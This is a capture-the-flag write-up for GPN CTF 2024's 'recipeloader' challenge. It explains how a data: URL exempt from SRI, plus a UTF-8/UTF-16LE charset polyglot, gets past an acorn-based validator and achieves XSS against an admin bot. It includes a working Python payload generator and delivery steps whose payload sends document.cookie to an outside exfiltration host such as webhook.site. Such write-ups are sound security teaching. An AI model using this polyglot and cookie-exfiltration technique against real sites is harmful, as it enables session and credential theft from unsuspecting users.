recipeloader

gpn24

Task: a client page validates a fetched JS 'recipe = \"...\"' with acorn then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL — UTF-8 view passes acorn's string-literal check, UTF-16LE view (honored by <script charset>) runs fetch() to exfiltrate the admin bot's flag cookie.

xss admin_bot cookie_exfiltration parser_differential sri_bypass data_url charset_confusion utf16_utf8_polyglot acorn html_script_charset

cookie_exfiltrationsri_bypass_via_static_schemefetch_vs_script_decoding_differentialutf16le_utf8_polyglotascii_nul_interleaveacorn_parser_bypass

$ ls tags/ techniques/

xss admin_bot cookie_exfiltration parser_differential sri_bypass data_url charset_confusion utf16_utf8_polyglot acorn html_script_charset

cookie_exfiltrationsri_bypass_via_static_schemefetch_vs_script_decoding_differentialutf16le_utf8_polyglotascii_nul_interleaveacorn_parser_bypass

recipeloader — GPN CTF 2024 (gpn24)

Description

You can load a javascript recipe pls no(w) xss

English summary: A client page (http://localhost:1337/) takes a ?url= parameter, fetch()es it, validates the text as a strict recipe = "..." assignment using the acorn parser, then injects the same URL as a <script src=url>. Non-static URL schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes (data:, blob:, ...) are exempted. An admin bot stores the flag in a normal, non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.

Analysis

The vulnerable load pattern (index.html)

async function runScript(url) {
  const txt = await fetch(url).then(r => r.text());
  if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program");
  const s = document.createElement("script");
  s.src = url;
  if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`;
  document.head.appendChild(s);
}

This is a classic check-then-load (TOCTOU) pattern: the validated bytes (txt from fetch) and the executed bytes (whatever <script src=url> resolves to) are two independent loads. The only thing keeping them identical is the SRI integrity attribute.

isRecipeAssignmentProgram(src) runs acorn with sourceType:"script" and demands EXACTLY: body.length === 1, a single ExpressionStatement that is an AssignmentExpression with operator "=", left = Identifier named recipe, right = a string Literal or expression-free TemplateLiteral. In other words the text must be exactly recipe = "...".
isScriptStatic(url) parses the URL and looks at the protocol:
- staticProtos = [data, blob, javascript, mailto, resource, ssh, tel] → no integrity.
- nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss] → integrity applied.
- Unknown protocol → throws.
sha256() uses Uint8Array.prototype.toBase64() to build the SRI digest.
After load, show() does recipeTarget.textContent = recipe — textContent, so no direct HTML injection is possible; we genuinely need script execution.

The bot (admin.js)

GET /bot/run requires typeof url === 'string' && url.startsWith('http://localhost:1337').
Headless chromium (playwright) goes to http://localhost:1337, runs document.cookie = "flag" + process.env.FLAG (cookie name is flag, value is the flag), then navigates to the attacker URL, waits 10s, logs document.cookie, closes.

So the flag is a normal same-origin cookie. Any JS executing on localhost:1337 can read it and exfiltrate it.

The key weakness — SRI exemption + decoding differential

For http:///https:// the SRI binding makes the validated text and the executed script byte-identical, so they cannot diverge. But data: is in staticProtos, so no integrity is enforced. We just need ONE byte sequence that:

when decoded by fetch().text() → passes the strict recipe = "..." acorn check, and
when executed by <script src=...> → is arbitrary JavaScript.

The differential that makes this possible:

fetch('data:...').text() decodes the body as UTF-8 and IGNORES the ;charset= parameter. Verified empirically: fetch('data:text/plain;charset=UTF-16LE,AB') returns the 2 ASCII chars A, B — not one UTF-16 code unit.
<script src="data:...;charset=UTF-16LE,..."> HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encoded window.__ran='YES' ran when loaded as a charset=UTF-16LE script.

Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.

Solution

Polyglot construction

We force a UTF-8 prefix recipe =" (note the space before =) and fill the string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily accepts raw NULs inside a string literal, so the UTF-8 view is a valid recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.

Engineering constraints (all required):

Space before =. In UTF-16LE the bytes r e c i p e SP = " decode to a run of CJK code points (敲楣数㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomes U+223D (∽, a math symbol) which is not an identifier char and breaks the UTF-16 program.
Avoid " (0x22) and \ (0x5c) inside the UTF-8 string body — those bytes would prematurely close/escape the UTF-8 string literal. Use single quotes in the payload.
Parity / alignment. recipe =" is 9 bytes (odd). One filler byte 0x3d (=) is prepended to the payload so the first UTF-16 unit after the prefix (0x22 paired with 0x3d → U+3D22, a valid identifier-continue char) keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ascii+NUL interleaving. A trailing space byte is added before the closing " if needed to keep total length even (it falls inside the UTF-16 // comment).

Final UTF-16LE program that actually runs:

敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠

In sloppy/script mode this assigns the fetch(...) result to an implicit global (allowed), and the trailing // comments out the leftover units (the closing-quote byte etc). The fetch leaks document.cookie to the attacker host.

Both views were validated programmatically: the UTF-8 view passes the exact acorn recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid sloppy-mode script.

Reusable solver — gen_payload.py

#!/usr/bin/env python3
import sys, urllib.parse
EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil"
TARGET = "http://localhost:1337/"

def utf16_ascii(s):
    out = bytearray()
    for ch in s:
        c = ord(ch); assert c < 128, ch
        out += bytes([c, 0])
    return bytes(out)

pre = b'recipe ="'                       # space before = is required for UTF-16 alignment
payload = "=fetch('//" + EXFIL + "?'+document.cookie)//"   # no " or \ allowed
content = bytes([0x3d]) + utf16_ascii(payload)
body = pre + content
full = body + b'"'
if len(full) % 2 != 0:
    full = body + b' "'
enc = ''.join('%%%02X' % b for b in full)
data_url = 'data:text/javascript;charset=UTF-16LE,' + enc
attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='')
bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='')
print("UTF-8  view:", full.decode('utf-8'))
print("UTF-16 view:", full.decode('utf-16le'))
print("DATA URL:\n" + data_url)
print("ATTACK URL:\n" + attack_url)
print("BOT URL:\n" + bot_url)

Delivery / exploitation steps

Generate the data: URL with a readable exfil host (used webhook.site; created a token via POST https://webhook.site/token).
Build the attack URL: http://localhost:1337/?url=<urlencoded data: URL>. It starts with http://localhost:1337, so it passes the bot's startsWith check.
Submit to the bot: GET https://<instance>/bot/run?url=<urlencoded attack URL> → bot replies ok.
The bot sets cookie flag+FLAG on localhost:1337, then visits the attack URL. The page fetch()es the data: URL (UTF-8 → valid recipe, passes validation, no SRI because data: is "static"), then loads the same data: URL as a <script charset=UTF-16LE> which executes the UTF-16 payload and fetches //webhook/?<document.cookie>.
Poll the webhook; received ...?flagGPNCTF{REDACTED} (cookie name flag + flag value).

The flag text itself confirms the bug class: "url parsing is hard even for browsers."